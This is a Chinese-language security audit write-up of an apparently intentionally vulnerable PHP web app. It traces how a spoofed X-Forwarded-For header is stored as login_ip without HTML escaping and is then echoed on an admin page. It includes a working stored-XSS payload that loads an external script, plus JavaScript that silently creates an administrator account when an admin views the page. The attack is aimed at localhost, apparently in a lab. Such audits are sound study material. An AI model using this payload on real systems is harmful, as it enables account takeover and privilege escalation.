审计4 XSS

在sys/libphp中

function get_client_ip(){
    if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")){
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    }else if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")){
        $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    }else if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")){
        $ip = $_SERVER["REMOTE_ADDR"];
    }else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")){
        $ip = $_SERVER['REMOTE_ADDR'];
    }else{
        $ip = "unknown";
    }
    return($ip);
}

在代码段中发现服务器在$_SERVER["HTTP_CLIENT_IP"] 中获取了客户端的ip，然后搜索这个自定义的函数 get_client_ip()看获取iP后，有没有对ip进行过滤。直接将其

带入了数据库，并更新数据库!

<?php
include_once('../sys/config.php');

if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
    $clean_name = clean_input($_POST['user']);
    $clean_pass = clean_input($_POST['pass']);
    $query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
    $data = mysql_query($query, $conn) or die('Error!!');

    if (mysql_num_rows($data) == 1) {
        $row = mysql_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        $_SESSION['avatar'] = $row['user_avatar'];
        $ip = sqlwaf(get_client_ip());
        $query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
        mysql_query($query, $conn) or die("updata error!");
        header('Location: user.php');
        }
    else {
        $_SESSION['error_info'] = '用户名或密码错误';
        header('Location: login.php');
    }
    mysql_close($conn);
}
else {
    not_find($_SERVER['PHP_SELF']);
}
?>

在14行发现只是用sqlwaf()函数对获取的ip进行了过滤。而sqlwaf在前面已经看过只是对sql语句进行了转移，而没有对xss的实体字符进行转义

 
发现login_ip的长度限制为255，所以可以尽情地xss不用考虑长度问题。

<?php 
include_once('../sys/config.php');

if (isset($_SESSION['admin'])) {
    include_once('../header.php');

    $query = "SELECT * FROM users ORDER BY user_id";
    $data = mysql_query($query, $conn) or die('Error');
    mysql_close($conn);
?>
<table class="items table">
    <thead>
    <tr>
        <th id="yw0_c0">Id</th>
        <th id="yw0_c4">Name</th>
        <th id="yw0_c4">Ip</th>
        <th id="yw0_c4">Manege</th>
    </thead>
    <tbody>
<?php while ($users = mysql_fetch_array($data)) {
    $html_user_name = htmlspecialchars($users['user_name']);
?>
    <tr class="odd">
        <td><?php echo $users['user_id'];?></a></td>
        <td><?php echo $html_user_name;?></td>
        <td><?php echo $users['login_ip'];?></td>
        <td><a href="delUser.php?id=<?php echo $users['user_id'];?>">删除</a></td>
    </tr>
<?php } ?>
</tbody>
</table>

<a href="manage.php">返回</a>
<?php 
require_once('../footer.php');
}
else {
    not_find($_SERVER['PHP_SELF']);
}
 ?>

在manageUser.php中，发现将login_ip直接输出了出来。由此可以看出XSS可以利用。

 

在用户登录时 修改x-forwarded-for  然后查看数据库发现

对包裹http的双引号进行了转义所以可以  直接把  <script src="http://127.0.0.1/post.js"></script>  直接改成<script src=http://127.0.0.1/post.js></script>他在浏览器加载的时候会自动生成双引号包裹

构造payload：

(function(){
    var xmlHttp;
    try{
        xmlHttp= new XMLHttpRequest();
    }catch(e){
        try{
        xmlHttp =new ActiveXObject('Msxm12.XMLHTTP');
        }catch(e){
            try{
        xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
        }catch(e){
        }
        }
    }
    xmlHttp.open("POST","http://127.0.0.1/admin/manageAdmin.php",true);
    xmlHttp.setRequestHeader('Content-type','application/x-www-form-urlencoded');
    xmlHttp.send('username=xsscsrf&password=123456'|| null);
})();

在管理员查看用户信息时被添加账号  xsscsrf管理员账号！

利用成功！